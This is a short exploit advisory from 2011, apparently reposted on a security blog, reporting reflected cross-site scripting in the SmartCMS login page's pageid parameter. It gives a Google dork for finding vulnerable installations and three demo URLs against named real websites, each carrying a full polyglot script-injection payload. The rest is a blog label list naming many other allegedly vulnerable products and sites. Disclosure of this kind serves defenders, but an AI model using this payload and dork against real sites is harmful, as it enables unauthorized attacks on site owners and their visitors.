# Exploit Title: SmartCMS Cross Site Scripting
# Google Dorks: intext:"powered by SmartCMS"
# Date: 25.08.2011
# Author: Sony
# Software Link: http://www.smartwebsites.com.cy/
# Version: all version
# POC: http://st2tea.blogspot.com/2011/08/smartcms-cross-site-scripting.html
..................................................................
XSS in the Login Page.
http://server/userauthentication.php?action=login&lang=en&pageid=[XSS]
Our code:
http://codepad.org/mMQfVBcw
Demo:
1.
http://www.aigaia.com.cy/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
2.
http://www.apollofundcyprus.com/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
3.
http://www.charilaoulab.com/userauthentication.php?action=login&lang=en&pageid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
skip to main |
skip to sidebar
Labels
adobe
Aimoo Forums
AliveChat
antivirus
artmedic CMS 3.5.1
Assembla.com
att.com
atWiki
avg
avira.com
Barracuda Web Filter 910
Berkeley
berkeley.edu
bigfood
bitrix
blekko.com
Bontq
books
Brainkeeper
Bravenet Web Services
ButorWiki
BW Rox
CarChat24
ChatBlazer
chip.de
CLiki
comm100
comodo.com
Compaq.com
Cross Site Scripting
Cross Site Scripting.
devianART
Discuz
drivers
ebaddy.com
Ebaytradingassistant.com
EditMe
etsi.org
fCMS
fidion.de
Fofou
Fortune3
forum
Forum.maxthon.com
foswiki
Frame Injection
funny xss
fusetalk
GForge
google
Gregarius
helpden
HTML Injection
i-am-bored.com
ICQ.com
IFrame Injection
inSecurity.Ro
Intel 82801DBM ICH4-M - AC'97 Audio Controller [B-1]
Invision Power Board 3.1.x -3.2.x
IP.Board 3.3.0
Jamroom
JavaBB 0.99
JaWiki
Jenkins
Kayako Fusion
LibAnalytics Springshare
LibAnswers Springshare
LibGuides
LibreSource
LiveHelpNow Chat
livejournal.com
Livemocha.com
LivePerson
Microsoft.com
MoniWiki
Motigo
msn.de
My Funny Quote
Myheritage.com
Nabble Forums
odnoklassniki.ru
Omnistar Live
Oracle
Otterware
Oxford
Pandasecurity.com
Photobucket.com
picowiki
Plandora
ProvideChat
ProWiki
RabbitWiki
radikal.ru
samsung
ScholarGuides Springshare
SchoolCenter Web Tools
seedwiki
sg
skadate
SmartCMS
Smugmug.com
SMW+ Enterprise Wiki 1.5.6
snipsnap
Some bank websites that suffer from Cross-site scripting vulnerabilities
SourceForge.net
sql
SQL Injection
Squarespace
Stanford
Tender Knowledge Base
Tiki Wiki CMS Groupware
toshiba.com
twiki
ubb
url injection
URL Redirect
Van Gogh
VBDrupal
vBulletin 4.1.10 - 4.1.11
velaro
video
ViewGit
Volusion Chat
voy forums
WebSVN
Wiki Spot
WonderDesk
wordpress
xClick Cart
xss
XWiki
Yuku Forums
ZetaBoards
zimbra
Zoho Planner
Blog Archive
Links
- #[in]Security.Ro Team
- #BigFlood[gimp,cosmos,etc..]
- #Flexxpoint Blog
- #Breakthesecurity
- #Bugtraq
- #Ethicalhacker
- #Hacktalk
- #Hellboundhackers
- #Packet Storm
- #PakCyberArmy
- #RST
- #Secunia
- #Securityfocus
- #Stopxaker
- #th3-0utl4ws
- #XSSed
- #Сxsecurity.com
- #Ehackingnews
- #Hackzona
- #ISS X-Force Database
- #Securitylab
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.